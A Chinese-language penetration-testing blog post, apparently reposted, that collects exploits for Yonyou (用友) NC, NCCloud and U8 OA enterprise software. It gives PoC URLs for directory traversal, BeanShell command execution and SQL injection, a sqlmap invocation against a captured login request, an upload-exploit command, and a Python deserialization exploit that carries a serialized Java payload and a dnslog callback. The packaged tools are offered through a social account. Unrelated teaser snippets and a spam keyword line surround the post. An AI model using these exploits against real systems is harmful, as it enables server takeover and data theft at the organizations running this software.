<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    滲透測試 | 用友各種漏洞整理

    VSole2021-07-12 15:13:31

    介紹:前段時間參加攻防演練的時候,發現目標系統有很多都使用了用友的產品,故整理一篇關于用友漏洞的文章。

    0x01 用友ERP-NC目錄遍歷漏洞

    1.1 漏洞描述

    用友ERP-NC存在目錄遍歷漏洞,攻擊者可以通過目錄遍歷獲取敏感文件信息

    1.2 漏洞復現

    poc

    /NCFindWeb?service=IPreAlertConfigService&filename=
    

    0x02 用友NC bsh.servlet.BshServlet遠程命令執行漏洞

    2.1 漏洞描述

    用友NC bsh.servlet.BshServlet存在遠程命令執行漏洞,通過BeanShell執行遠程命令獲取服務器權限。

    2.2 漏洞復現

    poc:

    /servlet/~ic/bsh.servlet.BshServlet
    

    0x03 用友NCCloud FS文件管理SQL注入

    3.1 漏洞描述

    用友NCCloud FS文件管理登錄頁面對用戶名參數沒有過濾,存在SQL注入

    3.2 漏洞復現

    nccloud登錄界面:

    文件服務器管理登錄頁面:

    http://xxx.xxx.xxx.xxx/fs/
    

    抓取登錄數據包:

    GET /fs/console?username=admin&password=%2Bz3VgEDJpVuEHdRPPzbCFTCa9Q0sKLOZ5q4ZLhxjuok%3D HTTP/1.1
    Host: xxx.xxx.xxx.xxx:xxxx
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Connection: close
    Referer: http://xxx.xxx.xxx.xxx:xxxx/fs/
    Cookie: JSESSIONID=1591C393D0A5D165A1D3FCBDE19E1426.server; JSESSIONID=923588EF04C38332C5E907DB6DCF1B00.server
    Upgrade-Insecure-Requests: 1
    

    sqlmap跑注入:

    sqlmap -r 1.txt -p username
    

    0x04 用友NC 6.5未授權文件上傳漏洞

    4.1 漏洞描述

    用友NC6.5版本存在未授權文件上傳漏洞,攻擊者可以未授權上傳任意文件,進而獲取服務端控制權限。

    4.2 漏洞復現

    nccloud登錄頁面:

    設置本地代理:

    zsh運行腳本:(腳本來源于tools,禁止利用于非法用途。)

    python3 nc.py -u http://xxx.xxx.xxx.xxx:xxxx/
    

    burp抓取本地數據包,黃色標記部分修改為上傳的內容:

    訪問返回的鏈接:

    0x05 用友NC XbrlPersistenceServlet反序列化

    5.1 漏洞描述

    已知用友NC6.5版本存在反序列化漏洞,攻擊者可以執行系統命令,獲取服務端權限。

    5.2 漏洞復現

    (1)利用一

    漏洞URL:

    /service/~xbrl/XbrlPersistenceServlet
    

    利用腳本:

    import requests
    import threadpool
    import urllib3
    import sys
    import base64
    
    ip = "x.x.x.x"
    dnslog = "*****" #dnslog把字符串轉16進制替換該段,測試用的ceye.io可以回顯
    data = "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x73\x72\x00\x0c\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x55\x52\x4c\x96\x25\x37\x36\x1a\xfc\xe4\x72\x03\x00\x07\x49\x00\x08\x68\x61\x73\x68\x43\x6f\x64\x65\x49\x00\x04\x70\x6f\x72\x74\x4c\x00\x09\x61\x75\x74\x68\x6f\x72\x69\x74\x79\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x04\x66\x69\x6c\x65\x71\x00\x7e\x00\x03\x4c\x00\x04\x68\x6f\x73\x74\x71\x00\x7e\x00\x03\x4c\x00\x08\x70\x72\x6f\x74\x6f\x63\x6f\x6c\x71\x00\x7e\x00\x03\x4c\x00\x03\x72\x65\x66\x71\x00\x7e\x00\x03\x78\x70\xff\xff\xff\xff\x00\x00\x00\x50\x74\x00\x11"+dnslog+"\x3a\x38\x30\x74\x00\x00\x74\x00\x0e"+dnslog+"\x74\x00\x04\x68\x74\x74\x70\x70\x78\x74\x00\x18\x68\x74\x74\x70\x3a\x2f\x2f"+dnslog+"\x3a\x38\x30\x78"
    
    uploadHeader={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"}
    req = requests.post("http://+"ip"+/service/~xbrl/XbrlPersistenceServlet", headers=uploadHeader, verify=False, data=data, timeout=25)
    print (req.text)
    

    (2)利用二

    usage

    java -jar nc6.5.jar [target] [command]
    

    0x06 用友U8 OA``SQL注入漏洞

    6.1 漏洞描述

    用友U8 OA test.jsp文件存在SQL注入漏洞,由于與致遠OA使用相同的文件,于是存在了同樣的漏洞。

    6.2 漏洞復現

    登錄界面:

    poc:

    /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))
    

    整改方案

    升級到最新版本,時刻關注官網的補丁。

    作者:goout

    關注公眾號,后臺回復 『0712-用友』,獲取打包好的所有工具

    滲透測試用友軟件集團
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    過去幾周,聯邦調查局、司法部 (DOJ)、國際刑警組織和其他國際執法機構共同努力逮捕和起訴勒索軟件威脅行為者。通過這些努力,已追回數百萬美元的贖金。談到法治,人人享有司法公正和公平審判都是任何民主社會的基礎。
    要說哪個網絡威脅組織同時具備狡猾的社會工程學能力和靈活的網絡安全技術,那就不得不提到Muddled Libra了。由于對企業信息技術有著深入的了解,即使你的組織機構擁有完善的傳統網絡防御系統,Muddled Libra也會對你產生巨大的威脅。
    2021 年 10 月 27 日,歐盟網絡和信息安全局(ENISA)發布《ENISA 2021年威脅態勢展望》報告,分析了全球面臨的九大網絡安全威脅,闡述了威脅趨勢、威脅參與者和攻擊技術等,提出了相關緩解和應對措施。2021 年該項工作得到了新組建的 ENISA 網絡安全威脅態勢 (CTL) 特設工作組的支持。該報告可幫助戰略決策者和政策制定者、政府及公司詳盡了解最新的網絡安全威脅,而且可針對性地
    Lookout Threat Lab的研究人員發現哈薩克斯坦政府在其境內使用企業級Android監控軟件。我們于2022年4月首次檢測到來自該活動的樣本。根據意大利下議院在2021年發布的一份文件,意大利當局可能在反腐敗行動中濫用了這個軟件。該文件提到了iOS版本的Hermit,并將RCS Lab和Tykelab與惡意軟件聯系起來,這證實了我們的分析。
    勒索軟件已成為一種日益普遍的全球威脅,2021年上半年,在眾多網絡威脅中表現最為亮眼也最為瘋狂。據SonicWall報告稱,相比2020年上半年,2021上半年勒索軟件攻擊數量增長了151%。攻擊規模和頻率以驚人的速度增長,復雜性和創新水平不斷提高,成為政府、企業、個人最為關注的安全風險之一,也是網絡安全最重大威脅之一。因此,有必要從發生原因、發展特點、打擊措施和防御建議等方面進行分析研究。
    KCon 2021部分PPT發布
    2021-11-09 07:32:15
    今年是 KCon 10周年,疫情環境下線下會議舉步維艱,原本計劃在8月底進行的大會隨后推遲到10月底。考慮到未到場聽眾的急切心情,我們決定提前對外發布 KCon 議題。這次披露的是QEMU中比較罕見的可控長度越界讀寫漏洞,可以穩定利用并進行虛擬機逃逸,本次是首次披露該模塊的漏洞細節。本議題將介紹如何針對 CFI 的固有缺陷來突破其防御。
    Osterman Research的一份調研報告指出,相較于子公司數量較少的企業,子公司數量眾多的跨國企業更容易受到網絡安全威脅,且更難以管理風險。
    本研究的系統分析揭示了一系列漏洞,這些漏洞證明了 EVCSMS 對遠程網絡攻擊的不安全性。考慮到此類攻擊的可行性,還討論了針對 EV 充電站 (EVCS,EV Charging Stations) 及其用戶的攻擊影響。
    在2017年,網絡攻擊者在一個金融軟件包中植入了NotPetya惡意蠕蟲。當很多企業更新他們的軟件時,就會被感染。NotPetya蠕蟲病毒因此迅速傳播,并為全球各地的企業帶來數十億美元的損失。美國政府稱其為“史上最具破壞性和代價最高的網絡攻擊”。 在三年后,網絡攻擊者侵入了SolarWinds公司的Orion網絡監控工具集的軟件升級過程。其帶來的破壞性也是十分廣泛的。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类